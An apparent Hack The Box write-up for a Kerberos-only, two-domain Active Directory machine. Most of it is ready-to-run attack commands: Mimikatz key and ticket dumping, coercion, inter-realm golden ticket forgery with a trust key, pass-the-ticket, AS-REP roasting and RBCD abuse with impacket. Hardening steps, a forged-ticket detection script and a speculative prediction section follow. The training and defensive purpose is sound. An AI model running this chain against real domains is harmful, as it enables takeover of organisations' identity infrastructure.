
Introduction:
In modern Active Directory environments, relying on NTLM hashes or password spraying is a dead end. The latest insane‑difficulty Hack The Box machine, “PingPong,” simulates a hardened Windows ecosystem with two domains, two domain controllers and NTLM authentication disabled outright, so there are no NTLM challenge‑responses to capture, crack or relay. Every authentication is Kerberos, and Kerberos enforces the default 5‑minute clock skew tolerance: a request whose authenticator timestamp differs from the KDC's clock by more than 300 seconds is rejected with KRB_AP_ERR_SKEW, and a misconfigured trust relationship ends the attack path just as abruptly. This article dissects the real‑world offensive techniques required to compromise such a setup, from abusing Kerberos delegation to working within the time‑synchronization constraint, turning a “no hash, no pass” environment into a foothold.
Learning Objectives:
- Exploit Kerberos unconstrained delegation and resource‑based constrained delegation (RBCD) across domain trusts without ever touching NTLM.
- Work within the clock skew tolerance by learning the DC's clock from its own Kerberos error replies, aligning your attacking host to it, and keeping forged ticket start times consistent with it.
- Enumerate Active Directory trust relationships, foreign security principals and ACL misconfigurations using PowerShell (PowerView) and Kerberos‑authenticated LDAP queries, with no NTLM fallback.
You Should Know:
1. Kerberos Forging in a Zero‑NTLM, Dual‑Domain Environment
The “PingPong” machine rejects any NTLM authentication attempt: no LM, NTLMv1 or NTLMv2. All inter‑domain and client‑server authentication relies solely on Kerberos. The 5‑minute clock skew tolerance (the Kerberos default) means a request whose authenticator timestamp is more than 300 seconds away from the KDC's clock is rejected with KRB_AP_ERR_SKEW (error 37); it is not silently dropped, and the KRB‑ERROR reply even carries the KDC's own time. To succeed, you abuse unconstrained delegation on a compromised server to harvest forwarded TGTs, then forge an inter‑realm ticket into the other domain with Mimikatz's kerberos::golden, signed with the trust key rather than krbtgt, while keeping its start time consistent with the target DC's clock.
Step‑by‑step guide:
- Enumerate delegation rights using `PowerView`:
Import-Module .\PowerView.ps1
Get-DomainUser -TrustedToAuth -Properties samaccountname, msds-allowedtodelegateto
Get-DomainComputer -Unconstrained -Properties dnshostname
- Compromise a server with unconstrained delegation (e.g., via a service vulnerability). Extract its Kerberos keys with `Mimikatz` (no NTLM hash needed; sekurlsa::ekeys dumps the AES256 and RC4 keys of every logon session):
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
- Coerce a privileged principal into authenticating to your compromised server. Coercion primitives such as `printerbug` or `PetitPotam` make the remote machine account (ideally a DC's, `DC$`) connect; point them at the compromised server's own FQDN so the client can use Kerberos, and with unconstrained delegation its forwardable TGT lands in your LSASS. A domain admin's TGT arrives only when a DA actually logs on to the host. Dump every cached ticket, not just your own session's:
mimikatz # sekurlsa::tickets /export
- Forge an inter‑realm ticket for the other domain. A golden ticket signed with your domain's `krbtgt` key is only valid inside that domain; the referral TGT the other domain's KDC accepts is encrypted with the trust key, which you obtain from the trust account (`OTHERDOMAIN$`) with `lsadump::dcsync` once you hold a DC machine TGT, or with `lsadump::trust /patch` on a DC. Mimikatz takes the lifetime parameters in minutes: `/startoffset:-2` backdates the start time slightly so the ticket is not “not yet valid” on a DC whose clock is behind yours, while `/endin` (600 is the 10‑hour default, matching the domain's default maximum ticket lifetime) and `/renewmax` govern lifetime, not skew:
mimikatz # kerberos::golden /domain:pingpong.local /sid:S-1-5-21-XXX /aes256:TRUST_KEY_AES256 /user:Administrator /service:krbtgt /target:otherdomain.local /ticket:trust_tgt.kirbi /startoffset:-2 /endin:600 /renewmax:10080
Across a forest trust, SID filtering strips any `/sids` you add from the target forest, so the forged principal only gets whatever rights principals from `pingpong.local` already hold in `otherdomain.local` (which section 3 enumerates).
- Pass the ticket and access the second domain's DC. Once the referral TGT is in your logon session, SSPI requests service tickets from the other KDC on demand, so standard tools work without any special switch:
mimikatz # kerberos::ptt trust_tgt.kirbi
mimikatz # kerberos::ask /target:cifs/TARGET-DC.otherdomain.local
PsExec.exe \\TARGET-DC.otherdomain.local cmd
Linux alternative with `impacket`: `ticketer.py` builds the same referral TGT when told to issue a service ticket for `krbtgt/<target realm>` under the trust key (its `-duration` is in hours, and it has no start‑offset option, so sync your clock first), then `getST.py -k` presents it to the other KDC for a service ticket:
ticketer.py -domain pingpong.local -domain-sid S-1-5-21-XXX -aesKey TRUST_KEY_AES256 -spn krbtgt/otherdomain.local -duration 10 Administrator
export KRB5CCNAME=Administrator.ccache
getST.py -k -no-pass -spn cifs/TARGET-DC.otherdomain.local -dc-ip TARGET-DC.otherdomain.local otherdomain.local/Administrator
export KRB5CCNAME=<ccache saved by getST>
psexec.py -k -no-pass otherdomain.local/Administrator@TARGET-DC.otherdomain.local
2. Working Within the 5‑Minute Clock Skew
When both domain controllers enforce time synchronization via `w32time` and there is no NTLM fallback, every Kerberos request you send carries an authenticator timestamp taken from your own clock, and the KDC or service rejects it with KRB_AP_ERR_SKEW if that timestamp is more than 5 minutes from its own time. The ticket's lifetime does not help here; what matters is that your attacking host's clock agrees with the DC's. Fortunately the DC tells you its time for free: every KRB‑ERROR it returns (the skew error itself, and the KDC_ERR_PREAUTH_REQUIRED reply to any unauthenticated AS‑REQ) contains the KDC's current time in its mandatory `stime`/`susec` fields.
Step‑by‑step guide:
- Query the target DC's current time without authentication, using `ntpdate` (NTP on UDP/123, which DCs serve) or Windows `w32tm`:
ntpdate -q target-dc.otherdomain.local
Or from a Windows host:
w32tm /stripchart /computer:target-dc.otherdomain.local /dataonly /samples:5
- Calculate the exact offset between your attacking host and the DC and correct for it. If the DC takes its time from an external NTP server, poisoning that feed would require a man‑in‑the‑middle position on the DC's upstream path; it is far simpler to move your own clock, since Kerberos only checks that the two agree:
sudo ntpdate -u target-dc.otherdomain.local
- When forging tickets, keep the ticket's start time at or slightly before the DC's clock (Mimikatz `/startoffset`, in minutes). A start time more than 5 minutes in the DC's future yields KRB_AP_ERR_TKT_NYV (“ticket not yet valid”); a start time in the past is harmless as long as the end time has not passed. `impacket`'s `ticketer.py` has no start‑offset option: it stamps the ticket with the local clock, so synchronize the host first.
- For interactive logins from a host you cannot re‑sync, set the system time explicitly with `timedatectl set-time` (Linux) or `Set-Date` (elevated PowerShell) before requesting tickets, or run only the tool under `libfaketime`. Safer still: request all tickets from a synchronized host and use `psexec.py -k` or `wmiexec.py -k` with the resulting ccache.
- Widening the tolerance itself is not a bypass but a post‑compromise change: the value the KDC enforces is domain Kerberos policy (“Maximum tolerance for computer clock synchronization” under Account Policies → Kerberos Policy in the Default Domain Policy), which needs Domain Admin rights to edit and is logged. The only registry knob is client‑side: `SkewTime` (in minutes) under the Kerberos parameters key, which changes what that Windows client tolerates, not what the DC accepts:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters /v SkewTime /t REG_DWORD /d 10 /f
If you change it, revert to `5` afterwards.
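The two points sections 1 and 2 turn on, that a KRB‑ERROR leaks the KDC's clock and that ticket start/end times are checked separately from the authenticator timestamp, are easier to see in code. The following is an added example, not code from the PingPong write‑up or from Mimikatz or impacket: it encodes a KRB‑ERROR with a tiny DER helper (a constructed reply standing in for one captured from a DC; tags follow RFC 4120 section 5.9.1), extracts `stime`/`susec` to compute the offset to apply locally, and then replays the acceptor‑side checks in one reasonable order. The timestamps, realm and error code are illustrative values chosen here.

```python
"""Added example for sections 1 and 2: read a KDC's clock out of an unauthenticated
KRB-ERROR, then apply the RFC 4120 acceptor checks to show that ticket start/end
times and the authenticator timestamp are tested separately.  The KRB-ERROR bytes
are constructed with a tiny DER encoder instead of being captured from a DC."""
from datetime import datetime, timedelta, timezone

KRB_AP_ERR_TKT_EXPIRED, KRB_AP_ERR_TKT_NYV, KRB_AP_ERR_REPEAT, KRB_AP_ERR_SKEW = 32, 33, 34, 37
KDC_ERR_PREAUTH_REQUIRED = 25
MAX_SKEW = timedelta(minutes=5)   # Windows default "Maximum tolerance for computer clock synchronization"


def _tlv(tag, body):
    """DER tag-length-value for single-byte tags (all we need here)."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        nb = (n.bit_length() + 7) // 8
        length = bytes([0x80 | nb]) + n.to_bytes(nb, "big")
    return bytes([tag]) + length + body


def _int(v):
    return _tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def _read(buf, pos):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        k = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + ln], pos + ln


def build_krb_error(stime, susec, error_code, realm, sname):
    """Constructed KRB-ERROR [APPLICATION 30] such as a KDC returns to a bare AS-REQ."""
    fields = (
        _tlv(0xA0, _int(5))                                         # pvno [0]
        + _tlv(0xA1, _int(30))                                      # msg-type [1] = KRB-ERROR
        + _tlv(0xA4, _tlv(0x18, stime.strftime("%Y%m%d%H%M%SZ").encode()))  # stime [4] KerberosTime
        + _tlv(0xA5, _int(susec))                                   # susec [5]
        + _tlv(0xA6, _int(error_code))                              # error-code [6]
        + _tlv(0xA9, _tlv(0x1B, realm.encode()))                    # realm [9] GeneralString
        + _tlv(0xAA, _tlv(0x30, _tlv(0xA0, _int(2))                 # sname [10] PrincipalName, NT-SRV-INST
                        + _tlv(0xA1, _tlv(0x30, b"".join(_tlv(0x1B, p.encode()) for p in sname)))))
    )
    return _tlv(0x7E, _tlv(0x30, fields))                           # [APPLICATION 30] SEQUENCE


def kdc_time_from_krb_error(der):
    """Return (KDC time, error-code) from any KRB-ERROR.  stime and susec are mandatory,
    so even the KDC_ERR_PREAUTH_REQUIRED reply to an unauthenticated AS-REQ reveals the clock."""
    tag, app, _ = _read(der, 0)
    if tag != 0x7E:
        raise ValueError("not a KRB-ERROR")
    _, seq, _ = _read(app, 0)
    ctx, pos = {}, 0
    while pos < len(seq):
        tag, val, pos = _read(seq, pos)
        ctx[tag & 0x1F] = _read(val, 0)[1]        # context tag number -> inner value bytes
    stime = datetime.strptime(ctx[4].decode(), "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)
    susec = int.from_bytes(ctx[5], "big", signed=True)
    code = int.from_bytes(ctx[6], "big", signed=True)
    return stime + timedelta(microseconds=susec), code


def clock_offset(der, local_now):
    """Seconds to add to the attacking host's clock to match the KDC (positive: KDC is ahead)."""
    kdc_now, _ = kdc_time_from_krb_error(der)
    return (kdc_now - local_now).total_seconds()


def ap_req_check(ticket_start, ticket_end, authenticator_ctime, server_now, seen):
    """Acceptor checks from RFC 4120 section 3.2.3, in one reasonable order.  Returns 0 or a
    KRB_AP_ERR code.  The authenticator timestamp comes from the client's clock at request
    time, so a long-lived or backdated ticket never compensates for a clock that is off."""
    if abs(authenticator_ctime - server_now) > MAX_SKEW:
        return KRB_AP_ERR_SKEW
    if ticket_start - server_now > MAX_SKEW:      # start may lead the server clock by at most the skew
        return KRB_AP_ERR_TKT_NYV
    if server_now > ticket_end:
        return KRB_AP_ERR_TKT_EXPIRED
    if authenticator_ctime in seen:               # replay cache spanning the skew window
        return KRB_AP_ERR_REPEAT
    seen.add(authenticator_ctime)
    return 0


def demo():
    """Constructed scenario: the DC is 200.25 s ahead of the attacking host."""
    dc_now = datetime(2024, 6, 1, 12, 0, 0, tzinfo=timezone.utc)
    reply = build_krb_error(dc_now, 250000, KDC_ERR_PREAUTH_REQUIRED, "PONG.LOCAL", ["krbtgt", "PONG.LOCAL"])
    start, end = dc_now - timedelta(minutes=2), dc_now + timedelta(hours=10)
    cache = set()
    return {
        "offset": clock_offset(reply, dc_now - timedelta(seconds=200)),
        "code": kdc_time_from_krb_error(reply)[1],
        "ok": ap_req_check(start, end, dc_now - timedelta(seconds=200), dc_now, set()),   # 200 s behind: fine
        "skew": ap_req_check(start, end, dc_now - timedelta(minutes=6), dc_now, set()),   # 6 min behind: 37
        "nyv": ap_req_check(dc_now + timedelta(minutes=6), end, dc_now, dc_now, set()),   # start too far ahead: 33
        "expired": ap_req_check(dc_now - timedelta(hours=11), dc_now - timedelta(minutes=1), dc_now, dc_now, set()),
        "replay": (ap_req_check(start, end, dc_now, dc_now, cache), ap_req_check(start, end, dc_now, dc_now, cache)),
    }


if __name__ == "__main__":
    print(demo())
```

The replay cache is why the skew window cannot simply be widened as a convenience: the larger the window, the more authenticators a server must remember before it can forget them.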
3. Enumerating Trusts and Foreign Principals Without NTLM
“PingPong” uses two domains, `PING.local` and `PONG.local`, joined by a bidirectional forest trust with selective authentication enabled. Anonymous SMB null sessions are out, because they ride on NTLM. Enumeration therefore uses Kerberos‑authenticated (GSSAPI/SASL) LDAP binds to the global catalog on `TCP/3268` with nothing more than a valid, unprivileged user's TGT; the `ForeignSecurityPrincipals` container of each domain lists the SIDs from the other forest that have been granted membership or rights there.
Step‑by‑step guide:
- Obtain an initial low‑privilege TGT. Without a password, AS‑REP roasting is the one Kerberos‑native option: any user with `DONT_REQ_PREAUTH` set hands a crackable AS‑REP to anyone who asks (rare on insane machines, but worth checking; with no credentials you must supply a candidate user list):
impacket-GetNPUsers ping.local/ -usersfile users.txt -no-pass -dc-ip dc.ping.local -format hashcat -outputfile asreproasts.txt
Once a password or AES key is recovered, request a real TGT over Kerberos only:
impacket-getTGT ping.local/attacker_user -aesKey AES256_KEY -dc-ip dc.ping.local
export KRB5CCNAME=attacker_user.ccache
- Enumerate trust relationships and foreign principals using `PowerView` from a controlled Windows host:
Get-DomainTrust -Domain ping.local
Get-DomainForeignUser -Domain ping.local
Get-DomainObject -Domain pong.local -SearchBase "CN=ForeignSecurityPrincipals,DC=pong,DC=local"
The first returns TrustDirection, TrustType, TrustAttributes and TargetName; the second lists users that are members of groups in the other domain; the third shows which PING SIDs PONG has granted something to.
- Map write access on PONG computer objects. RBCD is abused by writing `msDS-AllowedToActOnBehalfOfOtherIdentity`, so look for PING principals holding GenericAll, GenericWrite, WriteDacl, WriteOwner or WriteProperty on that attribute over any PONG computer:
Get-DomainComputer -Domain pong.local | Get-DomainObjectAcl -Domain pong.local -ResolveGUIDs |
  Where-Object { ($_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner') -or ($_.ObjectAceType -match 'Allowed-To-Act') } |
  Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, SecurityIdentifier
- Abuse resource‑based constrained delegation (RBCD). If `attacker_user` can write to a PONG computer object (say `PONG-COMP$`), grant delegation to that computer from an account you control that has an SPN; with a non‑zero `ms-DS-MachineAccountQuota` that is a machine account you add yourself (`ATTACKER$`). `rbcd.py` ships with impacket and supports Kerberos authentication:
rbcd.py -k -no-pass -dc-ip dc.pong.local -action write -delegate-to 'PONG-COMP$' -delegate-from 'ATTACKER$' 'ping.local/attacker_user'
- Request a service ticket for the target's CIFS service via S4U2self and S4U2proxy as `ATTACKER$`, impersonating a PONG administrator. The ticket is only good for the service you delegated to, which is why write access on the DC's own object would be the real prize; an account marked sensitive or in `Protected Users` cannot be impersonated this way:
getST.py -spn cifs/pong-comp.pong.local -impersonate Administrator -dc-ip dc.pong.local -aesKey ATTACKER_AES256_KEY 'pong.local/ATTACKER$'
export KRB5CCNAME=<ccache saved by getST>
smbclient.py -k -no-pass pong.local/Administrator@pong-comp.pong.local
4. Mitigating the “Leave No Hash” Approach in Your Own Enterprise
For defenders, “PingPong” demonstrates that eliminating NTLM alone is insufficient. Attackers will pivot to Kerberos delegation abuse, inter‑realm trust exploitation and clock manipulation. This section provides hardening commands.
Step‑by‑step guide:
- Remove unconstrained delegation from every server that is not a domain controller (DCs carry the flag by design, and stripping it breaks them), and mark privileged accounts as sensitive so their TGTs are never delegated:
Get-ADComputer -Filter 'TrustedForDelegation -eq $true' -Properties TrustedForDelegation |
  Where-Object { $_.DistinguishedName -notmatch 'OU=Domain Controllers,' } |
  Set-ADComputer -TrustedForDelegation $false
Get-ADGroupMember 'Domain Admins' | Set-ADUser -AccountNotDelegated $true
- Lock down resource‑based constrained delegation: nobody but tier‑0 admins should be able to write `msDS-AllowedToActOnBehalfOfOtherIdentity` on computer objects, and ordinary users should not be able to create the machine accounts the S4U chain needs. Audit who can modify it on a DC and zero the machine account quota:
dsacls "CN=DC,OU=Domain Controllers,DC=ping,DC=local" | findstr /i "Allowed-To-Act WRITE"
Set-ADDomain -Identity ping.local -Replace @{'ms-DS-MachineAccountQuota'='0'}
- Harden time synchronization: domain members should take time from the domain hierarchy, which Windows authenticates with keys derived from the machine account, and only the PDC emulator should talk to an external source (`w32tm` has no `/requireauthentication` switch):
w32tm /config /syncfromflags:domhier /update
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
w32tm /resync
The first line is for members and non‑PDCe DCs, the second for the PDC emulator only.
- Detect forged tickets. Event ID 4769 (service ticket request) carries no ticket lifetime, so look instead for an RC4 (`0x17`) encryption type where AES is policy, a service ticket for an account that never obtained a TGT (no matching 4768 from the same client) and domain names in an unexpected form:
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} | Where-Object {
  $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
  $d.TicketEncryptionType -eq '0x17' -or $d.TargetDomainName -notmatch '^(PING|PONG)\.LOCAL$' }
- Enforce AES only (set `msDS-SupportedEncryptionTypes` to AES and disable RC4 through the “Network security: Configure encryption types allowed for Kerberos” policy) and put privileged users, not domain controllers, into the `Protected Users` group: it forces AES, blocks delegation of their credentials and caps their TGT lifetime at four hours.
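The three 4769 heuristics above are simple enough to run outside PowerShell, and doing so makes the cross‑forest caveat explicit: a PONG user hitting a PING service legitimately has no PING‑side 4768, so the “no TGT issued by us” rule must only apply to the local realm. This is an added example, not part of the write‑up: the records are constructed here with the EventData field names Windows uses (real input would come from `Get-WinEvent` or a SIEM), and the realm names, hosts and the 10‑hour lookback (the default TGT lifetime) are assumptions.

```python
"""Added example: golden-ticket heuristics for Event ID 4769 over constructed
Security-log records.  4768 = TGT issued (AS exchange); 4769 = service ticket
requested (TGS exchange).  Field names mirror Windows EventData."""
from datetime import datetime, timedelta

LOCAL_REALMS = {"PING.LOCAL", "PONG.LOCAL"}   # assumed: the two forest realms in this lab
RC4_HMAC = "0x17"
LOOKBACK = timedelta(hours=10)                 # default TGT lifetime: a real 4769 follows a 4768 within it

# Constructed events, not real log output.
EVENTS = [
    {"Id": 4768, "Time": "2024-06-01T08:00:00", "TargetUserName": "alice",
     "TargetDomainName": "PING.LOCAL", "IpAddress": "10.10.1.20", "TicketEncryptionType": "0x12"},
    {"Id": 4769, "Time": "2024-06-01T08:00:05", "TargetUserName": "alice@PING.LOCAL",
     "TargetDomainName": "PING.LOCAL", "ServiceName": "cifs/fs01.ping.local",
     "IpAddress": "10.10.1.20", "TicketEncryptionType": "0x12"},
    # golden ticket: TGS request as Administrator from a host that never did an AS exchange, RC4 in an AES-only domain
    {"Id": 4769, "Time": "2024-06-01T08:07:00", "TargetUserName": "Administrator@PING.LOCAL",
     "TargetDomainName": "PING.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "10.10.1.77", "TicketEncryptionType": "0x17"},
    # forged ticket built with the NetBIOS name instead of the realm
    {"Id": 4769, "Time": "2024-06-01T08:09:00", "TargetUserName": "svc_backup@PING",
     "TargetDomainName": "PING", "ServiceName": "cifs/dc.ping.local",
     "IpAddress": "10.10.1.78", "TicketEncryptionType": "0x12"},
    # legitimate cross-forest access: the TGT came from the PONG KDC, so no local 4768 is expected
    {"Id": 4769, "Time": "2024-06-01T08:10:00", "TargetUserName": "bob@PONG.LOCAL",
     "TargetDomainName": "PONG.LOCAL", "ServiceName": "cifs/fs01.ping.local",
     "IpAddress": "10.10.2.15", "TicketEncryptionType": "0x12"},
]


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def suspicious_tgs_requests(events, this_realm="PING.LOCAL"):
    """Return {event index: [reasons]} for 4769 records matching the golden-ticket heuristics."""
    as_exchanges = [(e["TargetUserName"].lower(), e["IpAddress"], _ts(e)) for e in events if e["Id"] == 4768]
    findings = {}
    for i, e in enumerate(events):
        if e["Id"] != 4769:
            continue
        reasons = []
        user, realm = e["TargetUserName"].split("@")[0].lower(), e["TargetDomainName"]
        if e["TicketEncryptionType"] == RC4_HMAC:
            reasons.append("rc4 service ticket in an AES-only domain")
        if realm not in LOCAL_REALMS:
            reasons.append("unexpected domain name form %r" % realm)
        # Only our own KDC logs the 4768 for our own realm; skip the rule for referred (cross-realm) clients.
        if realm == this_realm and not any(
                u == user and ip == e["IpAddress"] and _ts(e) - LOOKBACK <= t <= _ts(e)
                for u, ip, t in as_exchanges):
            reasons.append("no 4768 from this client for this account (TGT never issued by us)")
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for idx, why in suspicious_tgs_requests(EVENTS).items():
        print(EVENTS[idx]["Time"], EVENTS[idx]["TargetUserName"], EVENTS[idx]["IpAddress"], "->", "; ".join(why))
```

Tune the lookback to the domain's actual maximum TGT lifetime, and feed 4768 records from every DC in the realm, since the AS exchange may have been served by a different DC than the TGS exchange.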
What Undercode Say:
- Key Takeaway 1: Insane‑difficulty AD machines like “PingPong” prove that NTLM deprecation is not a silver bullet – Kerberos delegation remains the largest attack surface in modern Windows domains.
- Key Takeaway 2: Clock skew, often ignored in basic pentests, becomes a critical constraint when NTLM fallback is absent. Keeping your own clock and your forged tickets aligned with the KDC separates intermediate from advanced operators.
- Analysis: The pivot from unconstrained delegation to RBCD across a forest trust mirrors real‑world attacks against federated environments (e.g., Azure AD Connect, ADFS). Organisations disabling NTLM without also restricting delegation and monitoring Kerberos ticket anomalies are still vulnerable. The 5‑minute tolerance is not an authenticity control and never was: the authenticator is encrypted under the session key, so whoever holds the key can always produce a timestamp the KDC accepts. The window exists to bound replay, and it only obstructs an attacker whose own clock is wrong, which is a problem the KDC's own error replies help solve.
Prediction:
As NTLM fades out in favour of Kerberos and cloud‑native identity (OAuth, SAML), red teaming will shift entirely to trust delegation abuse, token theft and time‑synchronisation attacks. Within two years, HTB and other platforms will roll out “True Zero Trust” machines that require chaining Kerberos protocol transition, S4U2self and a fake‑time‑server MITM in a single attack path. Enterprises will respond by adopting time‑as‑a‑service backed by hardware security modules (HSMs) and mandating short‑lived (5‑minute) tickets with mandatory renewal every 2 minutes, forcing attackers to operate in near real time without any margin for error. The era of “grab hash, pass it” is finally over; the era of “manipulate time, bend trust” has just begun.
Reported By: Thestingr Pingpong – Hackers Feeds